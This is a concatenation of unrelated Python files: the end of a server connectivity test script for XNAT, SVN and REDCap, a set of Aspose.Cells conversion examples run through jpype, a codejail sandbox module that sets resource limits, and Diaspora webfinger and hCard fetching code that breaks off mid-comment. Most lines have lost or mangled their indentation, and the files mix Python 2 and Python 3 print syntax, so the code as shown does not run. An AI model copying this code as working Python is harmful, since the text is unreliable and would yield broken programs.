# # If fails, MIKE solution
# server.select.experiment(xnat_eid).resource(resource_id).file(resource_file_bname).get_copy(os.path.join(tmpdir, "blub.tar.gz"))
# slog.takeTimer2("XNATStressTest","XNAT Stress Test")
# print("... completed")
# shutil.rmtree(tmpdir)
# else :
# warnings.warn(RuntimeWarning("Warning: Skipping XNAT stress test as it is not defined"))
# # 3. XNAT Test: Failed querry
# with sess.Capturing() as xnat_output:
# assert session.xnat_get_subject_attribute('blub','blub','blub')[0] == None
# if "ERROR: attribute could not be found" not in xnat_output.__str__():
# print("Error: session.xnat_get_subject_attribute: Test returned wrong error message")
# print(xnat_output.__str__())
# errors = True
# # no xnat tests after this one as it breaks the interface for some reason
server = None
elif project == 'svn_laptop' :
print("== Only works for frontend right now ! ==")
svn_client = session.svn_client()
assert svn_client, "Client should not be None"
svn_info = svn_client.info()
assert svn_info, "Info should not be None"
# To speed up test
lapDir = session.get_laptop_svn_dir()
svn_dir = [ name for name in os.listdir(lapDir) if name != ".svn" and os.path.isdir(os.path.join(lapDir, name)) ][0]
# and now test
assert svn_client.log(rel_filepath = svn_dir)
elif project == 'browser_penncnp' :
print("browser_penncnp Tests moved to different test methods")
# wait = session.initialize_penncnp_wait()
# assert session.get_penncnp_export_report(wait)
elif project == 'import_laptops' :
if "redcap_version_test" in list(config_test_data) :
(form_prefix, name_of_form) = config_test_data["redcap_version_test"].split(',')
complete_label = '%s_complete' % name_of_form
exclude_label = '%s_exclude' % form_prefix
                    # If the test fails (Mike) with a message that record_id is missing, then it uses the wrong redcap lib - use the egg version
import_complete_records = server.export_records( fields = [complete_label, exclude_label], format='df' )
else :
warnings.warn(RuntimeWarning("Warning: Skipping REDCap version test as it is not defined"))
elif project == 'data_entry' :
print("Testing REDCap Version:", session.get_redcap_version())
form_event_mapping = server.export_fem( format='df' )
assert not form_event_mapping.empty
# Note: the name of form_name is version-independent in mysql tables - see for example server.metadata
assert session.get_redcap_form_key() in form_event_mapping
assert len(server.export_records(fields=['study_id'],event_name='unique',format='df'))
if "redcap_stress_test" in list(config_test_data):
all_forms = config_test_data["redcap_stress_test"]
form_prefixes = list(all_forms.keys())
names_of_forms = list(all_forms.values())
entry_data_fields = [('%s_complete' % form) for form in names_of_forms] + [('%s_missing' % form) for form in form_prefixes] + [('%s_record_id' % form) for form in form_prefixes]
entry_data_fields += ['study_id', 'dob', 'redcap_event_name', 'visit_date', 'exclude', 'sleep_date']
entry_data_fields += ['parentreport_manual']
print("Start REDCap stress test ...")
slog.startTimer2()
# If tests fails, Mike
session.redcap_export_records("RCStressTest",fields=entry_data_fields,event_name='unique',format='df')
slog.takeTimer2("RCStressTest","REDCap Stress Test")
print(".... completed")
else :
warnings.warn(RuntimeWarning("Warning: Skipping REDCap stress test as it is not defined"))
elif project == 'redcap_mysql_db' :
pd.read_sql_table('redcap_projects', server)
# more detailed testing in test_redcap_locking_data
except AssertionError as ae:
_, _, tb = sys.exc_info()
# traceback.print_tb(tb) # Fixed format
tb_info = traceback.extract_tb(tb)
filename, line, func, text = tb_info[-1]
print("Error: Assertion: occurred on line {} in statement '{}'".format(line, text))
errors = True
except Exception as err_msg:
print("Error: Failed to retrieve content from " + project + ". Server responded :")
print(str(err_msg))
errors = True
# if project == 'browser_penncnp' :
# session.disconnect_penncnp()
assert not errors, "Errors occurred, see previous output."
print("Info: Time log writen to " + timeLogFile)
|
|
__author__ = 'fahadadeel'
import jpype
class ChartToImage:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ChartType = jpype.JClass("com.aspose.cells.ChartType")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.FileOutputStream = jpype.JClass("java.io.FileOutputStream")
self.Color = jpype.JClass("java.awt.Color")
def main(self):
chartType = self.ChartType
color = self.Color
imageFormat = self.ImageFormat
        #Create a Workbook
        workbook = self.Workbook()
        #Get the first worksheet
        sheet = workbook.getWorksheets().get(0)
        #Set the name of the worksheet
        sheet.setName("Data")
        #Get the cells collection in the sheet
        cells = workbook.getWorksheets().get(0).getCells()
        #Put some values into the cells of the Data sheet
cells.get("A1").setValue("Region")
cells.get("A2").setValue("France")
cells.get("A3").setValue("Germany")
cells.get("A4").setValue("England")
cells.get("A5").setValue("Sweden")
cells.get("A6").setValue("Italy")
cells.get("A7").setValue("Spain")
cells.get("A8").setValue("Portugal")
cells.get("B1").setValue("Sale")
cells.get("B2").setValue(70000)
cells.get("B3").setValue(55000)
cells.get("B4").setValue(30000)
cells.get("B5").setValue(40000)
cells.get("B6").setValue(35000)
cells.get("B7").setValue(32000)
cells.get("B8").setValue(10000)
#Create chart
chartIndex = sheet.getCharts().add(chartType.COLUMN, 12, 1, 33, 12)
chart = sheet.getCharts().get(chartIndex)
#Set properties of chart title
chart.getTitle().setText("Sales By Region")
chart.getTitle().getFont().setBold(True)
chart.getTitle().getFont().setSize(12)
#Set properties of nseries
chart.getNSeries().add("Data!B2:B8", True)
chart.getNSeries().setCategoryData("Data!A2:A8")
#Set the fill colors for the series's data points (France - Portugal(7 points))
chartPoints = chart.getNSeries().get(0).getPoints()
        point = chartPoints.get(0)
        point.getArea().setForegroundColor(self.Color.WHITE)
        point = chartPoints.get(1)
        point.getArea().setForegroundColor(self.Color.BLUE)
        point = chartPoints.get(2)
        point.getArea().setForegroundColor(self.Color.YELLOW)
        point = chartPoints.get(3)
        point.getArea().setForegroundColor(self.Color.RED)
        point = chartPoints.get(4)
        point.getArea().setForegroundColor(self.Color.BLACK)
        point = chartPoints.get(5)
        point.getArea().setForegroundColor(self.Color.GREEN)
        point = chartPoints.get(6)
        # java.awt.Color has no maroon constant, so build it from RGB values.
        point.getArea().setForegroundColor(self.Color(128, 0, 0))
#Set the legend invisible
        chart.setShowLegend(False)
#Get the Chart image
imgOpts = self.ImageOrPrintOptions()
imgOpts.setImageFormat(imageFormat.getEmf())
        fs = self.FileOutputStream(self.dataDir + "Chart.emf")
        #Save the chart image file
chart.toImage(fs, imgOpts)
fs.close()
# Print message
print("<BR>")
print("Processing performed successfully")
class ConvertingExcelFilesToHtml:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
        #Save the document in HTML format
workbook.save(self.dataDir + "OutBook1.html", saveFormat.HTML)
# Print message
print "\n Excel to HTML conversion performed successfully."
class ConvertingToMhtmlFiles:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.HtmlSaveOptions = jpype.JClass("com.aspose.cells.HtmlSaveOptions")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
#Specify the file path
filePath = self.dataDir + "Book1.xlsx"
#Specify the HTML saving options
sv = self.HtmlSaveOptions(saveFormat.M_HTML)
#Instantiate a workbook and open the template XLSX file
wb = self.Workbook(filePath)
#Save the MHT file
wb.save(filePath + ".out.mht", sv)
# Print message
print "Excel to MHTML conversion performed successfully."
class ConvertingToXPS:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.SheetRender = jpype.JClass("com.aspose.cells.SheetRender")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Get the first worksheet.
sheet = workbook.getWorksheets().get(0)
#Apply different Image and Print options
options = self.ImageOrPrintOptions()
#Set the Format
options.setSaveFormat(saveFormat.XPS)
# Render the sheet with respect to specified printing options
sr = self.SheetRender(sheet, options)
sr.toImage(0, self.dataDir + "out_printingxps.xps")
#Save the complete Workbook in XPS format
workbook.save(self.dataDir + "out_whole_printingxps", saveFormat.XPS)
# Print message
print "Excel to XPS conversion performed successfully."
class ConvertingWorksheetToSVG:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.SheetRender = jpype.JClass("com.aspose.cells.SheetRender")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Convert each worksheet into svg format in a single page.
imgOptions = self.ImageOrPrintOptions()
imgOptions.setSaveFormat(saveFormat.SVG)
imgOptions.setOnePagePerSheet(True)
#Convert each worksheet into svg format
sheetCount = workbook.getWorksheets().getCount()
#for(i=0; i<sheetCount; i++)
for i in range(sheetCount):
sheet = workbook.getWorksheets().get(i)
sr = self.SheetRender(sheet, imgOptions)
pageCount = sr.getPageCount()
#for (k = 0 k < pageCount k++)
for k in range(pageCount):
#Output the worksheet into Svg image format
sr.toImage(k, self.dataDir + sheet.getName() + ".out.svg")
# Print message
print "Excel to SVG conversion completed successfully."
class Excel2PdfConversion:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
saveFormat = self.SaveFormat
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Save the document in PDF format
workbook.save(self.dataDir + "OutBook1.pdf", saveFormat.PDF)
# Print message
print "\n Excel to PDF conversion performed successfully."
class ManagingDocumentProperties:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.SaveFormat = jpype.JClass("com.aspose.cells.SaveFormat")
def main(self):
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Retrieve a list of all custom document properties of the Excel file
customProperties = workbook.getWorksheets().getCustomDocumentProperties()
#Accessing a custom document property by using the property index
#customProperty1 = customProperties.get(3)
#Accessing a custom document property by using the property name
customProperty2 = customProperties.get("Owner")
#Adding a custom document property to the Excel file
publisher = customProperties.add("Publisher", "Aspose")
#Save the file
workbook.save(self.dataDir + "Test_Workbook.xls")
#Removing a custom document property
customProperties.remove("Publisher")
#Save the file
workbook.save(self.dataDir + "Test_Workbook_RemovedProperty.xls")
# Print message
print "Excel file's custom properties accessed successfully."
class OpeningFiles:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.FileFormatType = jpype.JClass("com.aspose.cells.FileFormatType")
self.LoadOptions = jpype.JClass("com.aspose.cells.LoadOptions")
self.FileInputStream = jpype.JClass("java.io.FileInputStream")
def main(self):
fileFormatType = self.FileFormatType
        # 1. Opening a workbook from a path
        # Creating a Workbook object with an Excel file path
        workbook1 = self.Workbook(self.dataDir + "Book1.xls")
        print("Workbook opened using path successfully.")
        # 2. Opening a workbook from a stream
        #Create a Stream object
        fstream = self.FileInputStream(self.dataDir + "Book2.xls")
        #Creating a Workbook object with the stream object
        workbook2 = self.Workbook(fstream)
        fstream.close()
        print("Workbook opened using stream successfully.")
# 3.
# Opening Microsoft Excel 97 Files
        #Creating an EXCEL_97_TO_2003 LoadOptions object
        loadOptions1 = self.LoadOptions(fileFormatType.EXCEL_97_TO_2003)
        #Creating a Workbook object with the Excel 97 file path and the loadOptions object
        workbook3 = self.Workbook(self.dataDir + "Book_Excel97_2003.xls", loadOptions1)
        # Print message
        print("Excel 97 Workbook opened successfully.")
# 4.
# Opening Microsoft Excel 2007 XLSX Files
        #Creating an XLSX LoadOptions object
        loadOptions2 = self.LoadOptions(fileFormatType.XLSX)
        #Creating a Workbook object with the 2007 xlsx file path and the loadOptions object
workbook4 = self.Workbook(self.dataDir + "Book_Excel2007.xlsx", loadOptions2)
# Print message
print ("Excel 2007 Workbook opened successfully.")
# 5.
# Opening SpreadsheetML Files
        #Creating an EXCEL_2003_XML LoadOptions object
        loadOptions3 = self.LoadOptions(fileFormatType.EXCEL_2003_XML)
        #Creating a Workbook object with the SpreadsheetML file path and the loadOptions object
workbook5 = self.Workbook(self.dataDir + "Book3.xml", loadOptions3)
# Print message
print ("SpreadSheetML format workbook has been opened successfully.");
# 6.
# Opening CSV Files
        #Creating a CSV LoadOptions object
        loadOptions4 = self.LoadOptions(fileFormatType.CSV)
        #Creating a Workbook object with the CSV file path and the loadOptions object
workbook6 = self.Workbook(self.dataDir + "Book_CSV.csv", loadOptions4)
# Print message
print ("CSV format workbook has been opened successfully.")
# 7.
# Opening Tab Delimited Files
        # Creating a TAB_DELIMITED LoadOptions object
        loadOptions5 = self.LoadOptions(fileFormatType.TAB_DELIMITED)
        # Creating a Workbook object with the tab-delimited text file path and the loadOptions object
workbook7 = self.Workbook(self.dataDir + "Book1TabDelimited.txt", loadOptions5)
# Print message
print("<br />");
print ("Tab Delimited workbook has been opened successfully.");
# 8.
# Opening Encrypted Excel Files
        # Creating an EXCEL_97_TO_2003 LoadOptions object
loadOptions6 = self.LoadOptions(fileFormatType.EXCEL_97_TO_2003)
# Setting the password for the encrypted Excel file
loadOptions6.setPassword("1234")
        # Creating a Workbook object with the file path and the loadOptions object
workbook8 = self.Workbook(self.dataDir + "encryptedBook.xls", loadOptions6)
# Print message
print("<br />");
print ("Encrypted workbook has been opened successfully.");
class SavingFiles:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.FileFormatType = jpype.JClass("com.aspose.cells.FileFormatType")
def main(self):
fileFormatType = self.FileFormatType
        #Creating a Workbook object with an Excel file path
workbook = self.Workbook(self.dataDir + "Book1.xls")
#Save in default (Excel2003) format
workbook.save(self.dataDir + "book.default.out.xls")
#Save in Excel2003 format
workbook.save(self.dataDir + "book.out.xls", fileFormatType.EXCEL_97_TO_2003)
#Save in Excel2007 xlsx format
workbook.save(self.dataDir + "book.out.xlsx", fileFormatType.XLSX)
#Save in SpreadsheetML format
workbook.save(self.dataDir + "book.out.xml", fileFormatType.EXCEL_2003_XML)
#Print Message
print("<BR>")
print("Worksheets are saved successfully.")
class WorksheetToImage:
def __init__(self,dataDir):
self.dataDir = dataDir
self.Workbook = jpype.JClass("com.aspose.cells.Workbook")
self.ImageFormat = jpype.JClass("com.aspose.cells.ImageFormat")
self.ImageOrPrintOptions = jpype.JClass("com.aspose.cells.ImageOrPrintOptions")
self.SheetRender = jpype.JClass("com.aspose.cells.SheetRender")
def main(self):
imageFormat = self.ImageFormat
#Instantiate a workbook with path to an Excel file
book = self.Workbook(self.dataDir + "Book1.xls")
#Create an object for ImageOptions
imgOptions = self.ImageOrPrintOptions()
#Set the image type
imgOptions.setImageFormat(imageFormat.getPng())
#Get the first worksheet.
sheet = book.getWorksheets().get(0)
#Create a SheetRender object for the target sheet
sr =self.SheetRender(sheet, imgOptions)
for i in range(sr.getPageCount()):
#Generate an image for the worksheet
sr.toImage(i, self.dataDir + "mysheetimg" + ".png")
# Print message
print "Images generated successfully."
|
|
"""Run code in a jail."""
import logging
import os
import os.path
import resource
import shutil
import sys
from .proxy import run_subprocess_through_proxy
from .subproc import run_subprocess
from .util import temp_directory
log = logging.getLogger("codejail")
# TODO: limit too much stdout data? # pylint: disable=fixme
# Configure the commands
# COMMANDS is a map from an abstract command name to a list of command-line
# pieces, such as subprocess.Popen wants.
COMMANDS = {}
def configure(command, bin_path, user=None):
"""
Configure a command for `jail_code` to use.
`command` is the abstract command you're configuring, such as "python" or
"node". `bin_path` is the path to the binary. `user`, if provided, is
the user name to run the command under.
"""
cmd_argv = [bin_path]
# Command-specific arguments
if command == "python":
# -E means ignore the environment variables PYTHON*
# -B means don't try to write .pyc files.
cmd_argv.extend(['-E', '-B'])
COMMANDS[command] = {
# The start of the command line for this program.
'cmdline_start': cmd_argv,
# The user to run this as, perhaps None.
'user': user,
}
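# A minimal configuration sketch (the binary path and user name are
# hypothetical; see the virtualenv auto-configuration below for the defaults):
#
#     configure("python", "/opt/python-sandbox/bin/python", user="sandbox")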
def is_configured(command):
"""
Has `jail_code` been configured for `command`?
Returns true if the abstract command `command` has been configured for use
in the `jail_code` function.
"""
return command in COMMANDS
# By default, look where our current Python is, and maybe there's a
# python-sandbox alongside. Only do this if running in a virtualenv.
# The check for sys.real_prefix covers virtualenv
# the equality of non-empty sys.base_prefix with sys.prefix covers venv
running_in_virtualenv = (
hasattr(sys, 'real_prefix') or
(hasattr(sys, 'base_prefix') and sys.base_prefix != sys.prefix)
)
if running_in_virtualenv:
# On jenkins
sandbox_user = os.getenv('CODEJAIL_TEST_USER')
sandbox_env = os.getenv('CODEJAIL_TEST_VENV')
if sandbox_env and sandbox_user:
configure("python", f"{sandbox_env}/bin/python", sandbox_user)
# or fall back to defaults
elif os.path.isdir(sys.prefix + "-sandbox"):
configure("python", sys.prefix + "-sandbox/bin/python", "sandbox")
# The resource limits that we use unless otherwise configured.
DEFAULT_LIMITS = {
    # CPU seconds, defaulting to 1.
    "CPU": 1,
    # Real time, defaulting to 1 second.
    "REALTIME": 1,
    # Total process virtual memory, in bytes, defaulting to 0 (unlimited).
    "VMEM": 0,
    # Size of files creatable, in bytes, defaulting to 0 (nothing can be written).
    "FSIZE": 0,
# The number of processes and threads to allow.
"NPROC": 15,
# Whether to use a proxy process or not. None means use an environment
# variable to decide. NOTE: using a proxy process is NOT THREAD-SAFE, only
# one thread can use CodeJail at a time if you are using a proxy process.
"PROXY": None,
}
# Configured resource limits.
# Modified by calling `set_limit`.
LIMITS = DEFAULT_LIMITS.copy()
# Map from limit_overrides_contexts (strings) to dictionaries in the shape of LIMITS.
# Modified by calling `override_limit`.
LIMIT_OVERRIDES = {}
def set_limit(limit_name, value):
"""
Set a limit for `jail_code`.
`limit_name` is a string, the name of the limit to set. `value` is the
value to use for that limit. The type, meaning, default, and range of
accepted values depend on `limit_name`.
These limits are available:
* `"CPU"`: the maximum number of CPU seconds the jailed code can use.
The value is an integer, defaulting to 1.
* `"REALTIME"`: the maximum number of seconds the jailed code can run,
in real time. The default is 1 second.
* `"VMEM"`: the total virtual memory available to the jailed code, in
bytes. The default is 0 (no memory limit).
* `"FSIZE"`: the maximum size of files creatable by the jailed code,
in bytes. The default is 0 (no files may be created).
* `"NPROC"`: the maximum number of process or threads creatable by the
jailed code. The default is 15.
* `"PROXY"`: 1 to use a proxy process, 0 to not use one. This isn't
really a limit, sorry about that.
Limits are process-wide, and will affect all future calls to jail_code.
Providing a limit of 0 will disable that limit.
"""
LIMITS[limit_name] = value
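# For example (values are illustrative, not recommendations):
#
#     set_limit("CPU", 2)       # allow 2 CPU seconds
#     set_limit("REALTIME", 5)  # allow 5 seconds of wall-clock time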
def get_effective_limits(overrides_context=None):
"""
Calculate the effective limits dictionary.
Arguments:
overrides_context (str|None): Identifies which set of overrides to use.
If None or missing from `LIMIT_OVERRIDES`, then just return `LIMITS` as-is.
"""
overrides = LIMIT_OVERRIDES.get(overrides_context, {}) if overrides_context else {}
return {**LIMITS, **overrides}
def override_limit(limit_name, value, limit_overrides_context):
"""
Override a limit for `jail_code`, but only in the context of `limit_overrides_context`.
See `set_limit` for the meaning of `limit_name` and `value`.
    All limits may be overridden except PROXY. Having this setting be different between
executions of code is not supported. If one attempts to override PROXY, the override
will be ignored and the globally-configured value will be used instead.
"""
if limit_name == 'PROXY' and LIMITS['PROXY'] != value:
log.error(
'Tried to override value of PROXY to %s. '
'Overriding PROXY on a per-context basis is not permitted. '
'Will use globally-configured value instead: %s.',
value,
LIMITS['PROXY'],
)
return
if limit_overrides_context not in LIMIT_OVERRIDES:
LIMIT_OVERRIDES[limit_overrides_context] = {}
LIMIT_OVERRIDES[limit_overrides_context][limit_name] = value
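# An illustrative sketch (the context name is made up): loosen the real-time
# budget for one caller while everyone else keeps the global limits.
#
#     override_limit("REALTIME", 10, "heavy-graders")
#     get_effective_limits("heavy-graders")  # REALTIME is 10 here
#     get_effective_limits()                 # global LIMITS, unchanged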
class JailResult:
"""
A passive object for us to return from jail_code.
"""
def __init__(self):
self.stdout = self.stderr = self.status = None
def jail_code(command, code=None, files=None, extra_files=None, argv=None,
stdin=None, limit_overrides_context=None, slug=None):
"""
Run code in a jailed subprocess.
`command` is an abstract command ("python", "node", ...) that must have
been configured using `configure`.
`code` is a string containing the code to run. If no code is supplied,
then the code to run must be in one of the `files` copied, and must be
named in the `argv` list.
`files` is a list of file paths, they are all copied to the jailed
directory. Note that no check is made here that the files don't contain
sensitive information. The caller must somehow determine whether to allow
the code access to the files. Symlinks will be copied as symlinks. If the
linked-to file is not accessible to the sandbox, the symlink will be
unreadable as well.
`extra_files` is a list of pairs, each pair is a filename and a bytestring
of contents to write into that file. These files will be created in the
temp directory and cleaned up automatically. No subdirectories are
supported in the filename.
`argv` is the command-line arguments to supply.
`stdin` is a string, the data to provide as the stdin for the process.
`limit_overrides_context` is an optional string to use as a key against the
configured limit overrides contexts. If omitted or if no such limit override context
has been configured, then use the default limits.
`slug` is an arbitrary string, a description that's meaningful to the
caller, that will be used in log messages.
Return an object with:
.stdout: stdout of the program, a string
.stderr: stderr of the program, a string
.status: exit status of the process: an int, 0 for success
"""
# pylint: disable=too-many-statements
if not is_configured(command):
raise Exception("jail_code needs to be configured for %r" % command)
# We make a temp directory to serve as the home of the sandboxed code.
# It has a writable "tmp" directory within it for temp files.
with temp_directory() as homedir:
# Make directory readable by other users ('sandbox' user needs to be
# able to read it).
os.chmod(homedir, 0o775)
# Make a subdir to use for temp files, world-writable so that the
# sandbox user can write to it.
tmptmp = os.path.join(homedir, "tmp")
os.mkdir(tmptmp)
os.chmod(tmptmp, 0o777)
argv = argv or []
# All the supporting files are copied into our directory.
for filename in files or ():
dest = os.path.join(homedir, os.path.basename(filename))
if os.path.islink(filename):
os.symlink(os.readlink(filename), dest)
elif os.path.isfile(filename):
shutil.copy(filename, homedir)
else:
shutil.copytree(filename, dest, symlinks=True)
# Create the main file.
if code:
with open(os.path.join(homedir, "jailed_code"), "wb") as jailed:
code_bytes = bytes(code, 'utf8')
jailed.write(code_bytes)
argv = ["jailed_code"] + argv
# Create extra files requested by the caller:
for name, content in extra_files or ():
with open(os.path.join(homedir, name), "wb") as extra:
extra.write(content)
cmd = []
rm_cmd = []
# Build the command to run.
user = COMMANDS[command]['user']
if user:
# Run as the specified user
cmd.extend(['sudo', '-u', user])
rm_cmd.extend(['sudo', '-u', user])
# Point TMPDIR at our temp directory.
cmd.extend(['TMPDIR=tmp'])
# Start with the command line dictated by "python" or whatever.
cmd.extend(COMMANDS[command]['cmdline_start'])
# Add the code-specific command line pieces.
cmd.extend(argv)
# Determine effective resource limits.
effective_limits = get_effective_limits(limit_overrides_context)
if slug:
log.info(
"Preparing to execute jailed code %r "
"(overrides context = %r, resource limits = %r).",
slug,
limit_overrides_context,
effective_limits,
)
# Use the configuration and maybe an environment variable to determine
# whether to use a proxy process.
use_proxy = effective_limits["PROXY"]
if use_proxy is None:
use_proxy = int(os.environ.get("CODEJAIL_PROXY", "0"))
if use_proxy:
run_subprocess_fn = run_subprocess_through_proxy
else:
run_subprocess_fn = run_subprocess
if stdin:
stdin = bytes(stdin, 'utf-8')
# Run the subprocess.
status, stdout, stderr = run_subprocess_fn(
cmd=cmd, cwd=homedir, env={}, slug=slug,
stdin=stdin,
realtime=effective_limits["REALTIME"],
rlimits=create_rlimits(effective_limits),
)
result = JailResult()
result.status = status
result.stdout = stdout
result.stderr = stderr
# Remove the tmptmp directory as the sandbox user since the sandbox
# user may have written files that the application user can't delete.
rm_cmd.extend([
'/usr/bin/find', tmptmp,
'-mindepth', '1', '-maxdepth', '1',
'-exec', 'rm', '-rf', '{}', ';'
])
# Run the rm command subprocess.
run_subprocess_fn(rm_cmd, cwd=homedir)
return result
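# A minimal usage sketch (assumes the "python" command was set up via the
# module's configuration function; the code and slug are illustrative):
#
#   result = jail_code(
#       "python",
#       code="print(sum(range(10)))",
#       slug="example-run",
#   )
#   # result.status == 0 on success; result.stdout holds the program output.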
def create_rlimits(effective_limits):
"""
Create a list of resource limits for our jailed processes.
Arguments:
effective_limits (dict)
"""
rlimits = []
# Allow a small number of subprocesses and threads. One limit controls both,
# and at least OpenBLAS (imported by numpy) requires threads.
nproc = effective_limits["NPROC"]
if nproc:
rlimits.append((resource.RLIMIT_NPROC, (nproc, nproc)))
# CPU seconds, not wall clock time.
cpu = effective_limits["CPU"]
if cpu:
# Set the soft limit and the hard limit differently. When the process
# reaches the soft limit, a SIGXCPU will be sent, which should kill the
# process. If you set the soft and hard limits the same, then the hard
# limit is reached, and a SIGKILL is sent, which is less distinctive.
rlimits.append((resource.RLIMIT_CPU, (cpu, cpu+1)))
# Total process virtual memory.
vmem = effective_limits["VMEM"]
if vmem:
rlimits.append((resource.RLIMIT_AS, (vmem, vmem)))
# Size of written files. Can be zero (nothing can be written).
fsize = effective_limits["FSIZE"]
rlimits.append((resource.RLIMIT_FSIZE, (fsize, fsize)))
return rlimits
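# A minimal sketch of how such a list is typically applied to a child process
# (illustrative; the actual wiring lives in `run_subprocess`):
#
#   def _apply_rlimits(rlimits):
#       for limit, (soft, hard) in rlimits:
#           resource.setrlimit(limit, (soft, hard))
#
#   # subprocess.Popen(cmd, preexec_fn=lambda: _apply_rlimits(rlimits), ...)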
|
|
import json
import logging
import xml
from typing import Callable, Dict
from urllib.parse import quote
from lxml import html
from xrd import XRD
from federation.inbound import handle_receive
from federation.types import RequestType
from federation.utils.network import fetch_document, try_retrieve_webfinger_document
from federation.utils.text import validate_handle
logger = logging.getLogger("federation")
def fetch_public_key(handle):
"""Fetch public key over the network.
:param handle: Remote handle to retrieve public key for.
:return: Public key in str format from parsed profile.
"""
profile = retrieve_and_parse_profile(handle)
return profile.public_key
def parse_diaspora_webfinger(document: str) -> Dict:
"""
Parse Diaspora webfinger which is either in JSON format (new) or XRD (old).
https://diaspora.github.io/diaspora_federation/discovery/webfinger.html
"""
webfinger = {
"hcard_url": None,
}
# noinspection PyBroadException
try:
doc = json.loads(document)
for link in doc["links"]:
if link["rel"] == "http://microformats.org/profile/hcard":
webfinger["hcard_url"] = link["href"]
break
else:
logger.warning("parse_diaspora_webfinger: found JSON webfinger but it has no hcard href")
raise ValueError
except Exception:
try:
xrd = XRD.parse_xrd(document)
webfinger["hcard_url"] = xrd.find_link(rels="http://microformats.org/profile/hcard").href
except (xml.parsers.expat.ExpatError, TypeError):
logger.warning("parse_diaspora_webfinger: found XML webfinger but it fails to parse")
return webfinger
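# A minimal sketch of the JSON form this parser accepts (values illustrative):
#
#   parse_diaspora_webfinger(json.dumps({
#       "links": [
#           {"rel": "http://microformats.org/profile/hcard",
#            "href": "https://example.com/hcard/users/1234"},
#       ],
#   }))
#   # -> {"hcard_url": "https://example.com/hcard/users/1234"}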
def retrieve_diaspora_hcard(handle):
"""
Retrieve a remote Diaspora hCard document.
:arg handle: Remote handle to retrieve
:return: str (HTML document)
"""
webfinger = retrieve_and_parse_diaspora_webfinger(handle)
document, code, exception = fetch_document(webfinger.get("hcard_url"))
if exception:
return None
return document
def retrieve_and_parse_diaspora_webfinger(handle):
"""
Retrieve and parse a remote Diaspora webfinger document.
:arg handle: Remote handle to retrieve
:returns: dict
"""
document = try_retrieve_webfinger_document(handle)
if document:
return parse_diaspora_webfinger(document)
host = handle.split("@")[1]
hostmeta = retrieve_diaspora_host_meta(host)
if not hostmeta:
return None
url = hostmeta.find_link(rels="lrdd").template.replace("{uri}", quote(handle))
document, code, exception = fetch_document(url)
if exception:
return None
return parse_diaspora_webfinger(document)
def retrieve_diaspora_host_meta(host):
"""
Retrieve a remote Diaspora host-meta document.
:arg host: Host to retrieve from
:returns: ``XRD`` instance
"""
document, code, exception = fetch_document(host=host, path="/.well-known/host-meta")
if exception:
return None
xrd = XRD.parse_xrd(document)
return xrd
def _get_element_text_or_none(document, selector):
"""
Using a CSS selector, get the element and return the text, or None if no element.
:arg document: ``HTMLElement`` document
:arg selector: CSS selector
:returns: str or None
"""
element = document.cssselect(selector)
if element:
return element[0].text
return None
def _get_element_attr_or_none(document, selector, attribute):
"""
Using a CSS selector, get the element and return the given attribute value, or None if no element.
Args:
document (HTMLElement) - HTMLElement document
selector (str) - CSS selector
attribute (str) - The attribute to get from the element
"""
element = document.cssselect(selector)
if element:
return element[0].get(attribute)
return None
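# A minimal usage sketch for the two helpers above (the markup is illustrative):
#
#   doc = html.fromstring('<span class="fn">Alice</span>'
#                         '<img class="photo" src="/a.png"/>')
#   _get_element_text_or_none(doc, ".fn")            # -> "Alice"
#   _get_element_attr_or_none(doc, ".photo", "src")  # -> "/a.png"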
def parse_profile_from_hcard(hcard: str, handle: str):
"""
Parse all the fields we can from a hCard document to get a Profile.
:arg hcard: HTML hcard document (str)
:arg handle: User handle in username@domain.tld format
:returns: ``federation.entities.diaspora.entities.DiasporaProfile`` instance
"""
from federation.entities.diaspora.entities import DiasporaProfile  # imported here to avoid a circular import
doc = html.fromstring(hcard)
profile = DiasporaProfile(
name=_get_element_text_or_none(doc, ".fn"),
image_urls={
"small": _get_element_attr_or_none(doc, ".entity_photo_small .photo", "src"),
"medium": _get_element_attr_or_none(doc, ".entity_photo_medium .photo", "src"),
"large": _get_element_attr_or_none(doc, ".entity_photo .photo", "src"),
},
public=True,
id=handle,
handle=handle,
guid=_get_element_text_or_none(doc, ".uid"),
public_key=_get_element_text_or_none(doc, ".key"),
username=handle.split('@')[0],
_source_protocol="diaspora",
)
return profile
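# A minimal sketch of the kind of hCard fragment this expects (illustrative,
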